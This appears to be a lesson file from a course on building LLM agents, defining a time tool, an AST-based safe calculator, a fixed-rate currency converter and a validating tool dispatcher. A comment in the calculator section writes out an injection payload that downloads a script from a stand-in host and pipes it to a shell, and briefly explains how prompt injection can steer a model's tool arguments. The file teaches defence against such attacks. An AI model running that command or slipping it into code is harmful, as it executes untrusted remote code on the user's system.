"""Real tools, and the dispatcher that decides whether to run them.

Lesson 0's probe stopped after the model *asked* for a tool. This file provides
the other half: actual functions, and the code that maps a model's request onto
them.

Two ideas dominate this file.

**1. The dispatcher is your security boundary.** A model can request anything at
all -- a tool you never defined, arguments of the wrong type, an expression
designed to hang your process. None of that matters if the dispatcher refuses.
The model has no power; `dispatch()` has all of it. Everything in lesson 11 about
sandboxing and guardrails is an elaboration of this one function.

**2. A tool failure is data, not an exception.** When a tool cannot do its job,
the agent should not crash. It should tell the model what went wrong so the model
can try something else. So `dispatch()` never raises -- it returns a string
either way, and that string goes back into the conversation as an observation.
This is the same validate-and-repair shape as lesson 1, applied to tools.
"""

from __future__ import annotations

import ast
import math
import operator
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Callable
from zoneinfo import ZoneInfo, ZoneInfoNotFoundError

from llmkit import ToolCall, ToolSpec


class ToolError(Exception):
    """A tool could not do its job for a reason the model should hear about.

    Distinct from a bug. "You gave me a currency I don't support" is a ToolError
    and the model can recover from it by picking a different currency. A
    TypeError in your own code is not -- that's yours to fix.
    """


# ---------------------------------------------------------------------------
# Tool 1: something the model cannot possibly know
# ---------------------------------------------------------------------------
def get_current_time(timezone: str = "UTC") -> str:
    """The clearest demonstration of why tools exist.

    A model's weights were frozen at training time. It has no clock, no network
    and no ability to observe anything. Ask it the time and the honest answer is
    "I cannot know" -- run `agent.py --no-tools` to watch it say exactly that.

    Give it this tool and the division of labour becomes obvious: the model
    handles language and intent, your code handles facts about the world.
    """
    try:
        zone = ZoneInfo(timezone)
    except (ZoneInfoNotFoundError, ValueError) as exc:
        raise ToolError(
            f"Unknown timezone {timezone!r}. Use an IANA name such as "
            f"'UTC', 'Asia/Kolkata', 'America/New_York' or 'Europe/London'."
        ) from exc

    now = datetime.now(zone)
    return (
        f"{now.strftime('%Y-%m-%d %H:%M:%S')} ({timezone}, "
        f"UTC{now.strftime('%z')[:3]}:{now.strftime('%z')[3:]}), "
        f"{now.strftime('%A')}"
    )


TIME_SPEC = ToolSpec(
    name="get_current_time",
    description=(
        "Get the current date and time in a specific timezone. Use this whenever "
        "the user asks about the current time, today's date, or the day of the week."
    ),
    parameters={
        "type": "object",
        "properties": {
            "timezone": {
                "type": "string",
                "description": (
                    "IANA timezone name, for example 'UTC', 'Asia/Kolkata', "
                    "'America/New_York'. Defaults to UTC if the user did not say."
                ),
            }
        },
        "required": [],
    },
)


# ---------------------------------------------------------------------------
# Tool 2: something the model is unreliable at
# ---------------------------------------------------------------------------
# The obvious implementation of a calculator tool is:
#
#     def calculate(expression): return str(eval(expression))
#
# Do not do this. `expression` is a string generated by a language model, and a
# model can be talked into producing anything by text it reads (a retrieved
# document, a web page, a user message -- see lesson 11 on prompt injection).
# eval() on that string is arbitrary code execution in your process:
#
#     __import__('os').system('curl evil.sh | sh')
#
# So we parse the expression into a syntax tree and walk it, allowing an explicit
# list of node types and nothing else. This is the allowlist principle applied
# inside a tool: enumerate what is permitted, reject everything else. Trying to
# blocklist dangerous inputs instead is a game you lose.
_BINARY_OPS: dict[type[ast.AST], Callable[[Any, Any], Any]] = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
}

_UNARY_OPS: dict[type[ast.AST], Callable[[Any], Any]] = {
    ast.UAdd: operator.pos,
    ast.USub: operator.neg,
}

_ALLOWED_FUNCS: dict[str, Callable[..., Any]] = {
    "sqrt": math.sqrt,
    "abs": abs,
    "round": round,
    "min": min,
    "max": max,
    "log": math.log,
    "log10": math.log10,
    "floor": math.floor,
    "ceil": math.ceil,
}

# Even with eval() gone, `9**9**9` would pin a CPU core and exhaust memory. A
# resource limit is a separate concern from a code-execution limit, and you need
# both.
_MAX_EXPONENT = 64


def _evaluate(node: ast.AST) -> float:
    if isinstance(node, ast.Expression):
        return _evaluate(node.body)

    if isinstance(node, ast.Constant):
        if isinstance(node.value, bool) or not isinstance(node.value, (int, float)):
            raise ToolError("Only numbers are allowed in expressions.")
        return node.value

    if isinstance(node, ast.BinOp):
        op = _BINARY_OPS.get(type(node.op))
        if op is None:
            raise ToolError(f"Operator {type(node.op).__name__} is not allowed.")
        left, right = _evaluate(node.left), _evaluate(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > _MAX_EXPONENT:
            raise ToolError(f"Exponent too large (limit {_MAX_EXPONENT}).")
        try:
            return op(left, right)
        except ZeroDivisionError as exc:
            raise ToolError("Division by zero.") from exc

    if isinstance(node, ast.UnaryOp):
        op = _UNARY_OPS.get(type(node.op))
        if op is None:
            raise ToolError(f"Unary {type(node.op).__name__} is not allowed.")
        return op(_evaluate(node.operand))

    if isinstance(node, ast.Call):
        if not isinstance(node.func, ast.Name):
            # Not a bare name, so it is something like `os.system` or
            # `open(...).read` -- an attribute chain. Refuse and say so
            # specifically, because a vague error teaches the reader nothing
            # about what was blocked.
            raise ToolError(
                "Attribute access is not allowed in expressions "
                f"(got {type(node.func).__name__}). Use only plain functions: "
                f"{', '.join(sorted(_ALLOWED_FUNCS))}."
            )
        if node.func.id not in _ALLOWED_FUNCS:
            raise ToolError(
                f"Function {node.func.id!r} is not allowed. Available: "
                f"{', '.join(sorted(_ALLOWED_FUNCS))}."
            )
        if node.keywords:
            raise ToolError("Keyword arguments are not supported.")
        return _ALLOWED_FUNCS[node.func.id](*[_evaluate(a) for a in node.args])

    # Anything not explicitly handled above is refused. Note that this rejects
    # attribute access, subscripting, names, comprehensions and imports -- the
    # building blocks of an exploit -- without needing to know they exist.
    raise ToolError(f"Expression element {type(node).__name__} is not allowed.")


def calculate(expression: str) -> str:
    """Evaluate an arithmetic expression exactly.

    Models predict tokens; they do not run an ALU. They are surprisingly good at
    arithmetic that resembles their training data and unreliable on long
    multiplications and precise decimals. Delegating to Python turns a
    probabilistic guess into a deterministic answer.
    """
    try:
        tree = ast.parse(expression, mode="eval")
    except SyntaxError as exc:
        raise ToolError(f"Could not parse {expression!r}: {exc.msg}") from exc

    result = _evaluate(tree)

    if isinstance(result, float):
        if math.isnan(result) or math.isinf(result):
            raise ToolError("Result is not a finite number.")
        if result == int(result) and abs(result) < 1e15:
            return f"{expression} = {int(result)}"
        return f"{expression} = {result:.10g}"
    return f"{expression} = {result}"


CALCULATE_SPEC = ToolSpec(
    name="calculate",
    description=(
        "Evaluate an arithmetic expression exactly. Use this for any calculation "
        "rather than working it out yourself, especially multiplication of large "
        "numbers, percentages and decimals. Supports + - * / // % ** and the "
        "functions sqrt, abs, round, min, max, log, log10, floor, ceil."
    ),
    parameters={
        "type": "object",
        "properties": {
            "expression": {
                "type": "string",
                "description": (
                    "A Python-syntax arithmetic expression, for example "
                    "'48239 * 7841' or 'sqrt(2) * 100'. Numbers and operators "
                    "only -- no variables."
                ),
            }
        },
        "required": ["expression"],
    },
)


# ---------------------------------------------------------------------------
# Tool 3: something that fails in a recoverable way
# ---------------------------------------------------------------------------
# Deliberately a static table, not a live API. Two reasons: the lessons must run
# offline and without extra keys, and a tool that raises predictably is what
# makes the error-handling demo in failures.py reproducible.
#
# Note the honesty requirement -- the tool's own output says the rates are fixed
# and illustrative. A tool that quietly returns made-up data teaches a model (and
# a user) to trust something it should not. If your tool's data is stale or
# approximate, say so *in the tool result*, because that string is all the model
# will ever know about it.
_RATES_PER_USD: dict[str, float] = {
    "USD": 1.0,
    "EUR": 0.92,
    "GBP": 0.79,
    "INR": 83.40,
    "JPY": 157.20,
    "AUD": 1.52,
    "CAD": 1.37,
}


def convert_currency(amount: float, from_currency: str, to_currency: str) -> str:
    """Convert between currencies using a fixed illustrative rate table."""
    try:
        amount = float(amount)
    except (TypeError, ValueError) as exc:
        raise ToolError(f"amount must be a number, got {amount!r}.") from exc

    source, target = str(from_currency).upper(), str(to_currency).upper()
    supported = ", ".join(sorted(_RATES_PER_USD))

    for code in (source, target):
        if code not in _RATES_PER_USD:
            raise ToolError(f"Unsupported currency {code!r}. Supported: {supported}.")

    converted = amount / _RATES_PER_USD[source] * _RATES_PER_USD[target]
    return (
        f"{amount:,.2f} {source} = {converted:,.2f} {target} "
        f"(fixed illustrative rate, not live market data)"
    )


CURRENCY_SPEC = ToolSpec(
    name="convert_currency",
    description=(
        "Convert an amount from one currency to another using a fixed rate table. "
        "Supported currencies: USD, EUR, GBP, INR, JPY, AUD, CAD."
    ),
    parameters={
        "type": "object",
        "properties": {
            "amount": {"type": "number", "description": "The amount to convert."},
            "from_currency": {
                "type": "string",
                "description": "Three-letter source currency code, e.g. 'USD'.",
            },
            "to_currency": {
                "type": "string",
                "description": "Three-letter target currency code, e.g. 'INR'.",
            },
        },
        "required": ["amount", "from_currency", "to_currency"],
    },
)


# ---------------------------------------------------------------------------
# The registry: the allowlist, by construction
# ---------------------------------------------------------------------------
@dataclass(frozen=True)
class Tool:
    spec: ToolSpec
    fn: Callable[..., str]


REGISTRY: dict[str, Tool] = {
    TIME_SPEC.name: Tool(TIME_SPEC, get_current_time),
    CALCULATE_SPEC.name: Tool(CALCULATE_SPEC, calculate),
    CURRENCY_SPEC.name: Tool(CURRENCY_SPEC, convert_currency),
}

ALL_SPECS = [tool.spec for tool in REGISTRY.values()]


# ---------------------------------------------------------------------------
# The dispatcher
# ---------------------------------------------------------------------------
@dataclass
class Execution:
    """What happened when we tried to run one requested tool."""

    name: str
    arguments: dict[str, Any]
    result: str
    ok: bool
    failure_kind: str | None = None  # for teaching output; not sent to the model


def dispatch(call: ToolCall) -> Execution:
    """Run one tool the model asked for, and never raise.

    Read the order of the checks below -- it is the whole security model:

      1. Is the name one we published?     (blocks hallucinated tools)
      2. Did the arguments parse as JSON?  (blocks malformed output)
      3. Are the required arguments there? (blocks incomplete calls)
      4. Does the signature match?         (blocks wrong/extra arguments)
      5. Did the tool itself object?       (recoverable domain errors)
      6. Did our own code break?           (a bug, reported without a stack trace)

    Every failure returns a *description of the failure* as the tool result. The
    model reads it as an observation and can correct course. Compare that with
    raising: the process dies, the model learns nothing, and a recoverable
    mistake becomes an outage.

    Note what is deliberately absent: no getattr, no eval, no import, no string
    interpolation into a shell. The only way to reach a function is a dict lookup
    against names we defined ourselves, which means a tool that isn't in the
    registry cannot be reached no matter what the model emits.
    """
    # 1. Hallucinated or retired tool name.
    tool = REGISTRY.get(call.name)
    if tool is None:
        available = ", ".join(sorted(REGISTRY))
        return Execution(
            name=call.name,
            arguments={},
            result=f"Error: no tool named '{call.name}'. Available tools: {available}.",
            ok=False,
            failure_kind="unknown_tool",
        )

    # 2. The model wrote invalid JSON for the arguments.
    if not call.is_valid:
        return Execution(
            name=call.name,
            arguments={},
            result=(
                f"Error: your arguments for '{call.name}' were not valid JSON. "
                f"Received: {call.malformed_arguments!r}. "
                f"Send a JSON object matching the tool's schema."
            ),
            ok=False,
            failure_kind="malformed_json",
        )

    # 3. Required arguments present? Checked here rather than relying on a
    #    TypeError, so the message names the missing field precisely.
    required = set(tool.spec.parameters.get("required", []))
    missing = required - set(call.arguments)
    if missing:
        return Execution(
            name=call.name,
            arguments=call.arguments,
            result=(
                f"Error: '{call.name}' is missing required argument(s): "
                f"{', '.join(sorted(missing))}."
            ),
            ok=False,
            failure_kind="missing_argument",
        )

    # 4-6. Run it.
    try:
        result = tool.fn(**call.arguments)
        return Execution(call.name, call.arguments, result, ok=True)

    except ToolError as exc:
        # The tool worked as designed and is reporting a domain problem. This is
        # the most useful kind of failure: specific, and actionable by the model.
        return Execution(
            call.name, call.arguments, f"Error: {exc}", ok=False, failure_kind="tool_error"
        )

    except TypeError as exc:
        # Wrong or extra arguments for the signature.
        return Execution(
            call.name,
            call.arguments,
            f"Error: '{call.name}' rejected those arguments: {exc}",
            ok=False,
            failure_kind="bad_signature",
        )

    except Exception as exc:  # noqa: BLE001
        # A genuine bug in our tool. Report the type but not the traceback:
        # internal paths and source lines are noise to the model and can leak
        # information you would rather not put in a prompt.
        return Execution(
            call.name,
            call.arguments,
            f"Error: '{call.name}' failed unexpectedly ({type(exc).__name__}).",
            ok=False,
            failure_kind="internal_error",
        )
